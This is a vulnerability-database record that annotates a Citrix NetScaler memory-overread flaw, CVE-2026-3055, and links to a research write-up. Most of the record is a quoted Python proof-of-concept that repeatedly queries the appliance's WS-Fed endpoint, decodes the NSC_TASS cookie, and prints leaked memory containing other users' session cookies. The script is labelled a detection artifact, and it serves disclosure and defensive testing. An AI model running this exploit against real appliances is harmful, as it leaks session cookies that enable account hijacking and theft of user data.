{"uuid": "596d1296-f91f-4f84-a3e6-03aa10878635", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "title": "Please, We Beg, Just One Weekend Free Of Appliances (Citrix NetScaler CVE-2026-3055 Memory Overread Part 2)", "description": "For more details -> https://labs.watchtowr.com/please-we-beg-just-one-weekend-free-of-appliances-citrix-netscaler-cve-2026-3055-memory-overread-part-2/\n\nwhich includes \n\n~~~python\nimport base64\n\nimport requests\nimport urllib3\n\nurllib3.disable_warnings()\n\nBANNER = \"\"\"\t\t\t __ ___ ___________ \n\t __ _ ______ _/ |__ ____ | |_\\\\__ ____\\\\____ _ ________ \n\t \\\\ \\\\/ \\\\/ \\\\__ \\\\ ___/ ___\\\\| | \\\\| | / _ \\\\ \\\\/ \\\\/ \\\\_ __ \\\\\n\t \\\\ / / __ \\\\| | \\\\ \\\\___| Y | |( <_> \\\\ / | | \\\\/\n\t \\\\/\\\\_/ (____ |__| \\\\___ |___|__|__ | \\\\__ / \\\\/\\\\_/ |__| \n\t\t\t\t \\\\/ \\\\/ \\\\/ \n\nwatchTowr-vs-Citrix-NetScaler-CVE-2026-3055.py\n(*) Citrix NetScaler Memory Overread Detection Artifact Generator - Aliz Hammond of watchTowr (@watchTowrcyber)\nCVEs: [CVE-2026-3055]\n\"\"\"\n\nprint(BANNER)\n\nwhile True:\n try:\n resp = requests.get(\"https://<host>/wsfed/passive?wctx\", verify=False, allow_redirects=False)\n tass = resp.cookies.get('NSC_TASS', None)\n if tass is None:\n continue\n tassText = base64.b64decode(tass)\n memIdx = tassText.find(b'wctx=')\n if memIdx != -1:\n bled = tassText[memIdx+5:]\n cookiePos = bled.find(b'Cookie')\n if cookiePos != -1:\n print(bled[cookiePos:].decode('ascii', errors='ignore'))\n except Exception:\n pass\n~~~", "description_format": "markdown", "vulnerability": "CVE-2026-3055", "creation_timestamp": "2026-03-30T06:20:52.093292+00:00", "timestamp": "2026-03-30T06:20:52.093292+00:00", "related_vulnerabilities": ["CVE-2026-3055"], "meta": [{"tags": ["vulnerability:information=annotation"]}], "author": {"login": "sync_user", "name": "sync_user", "uuid": "4f29edb9-4c4b-44ca-b041-9b050656b6ae"}}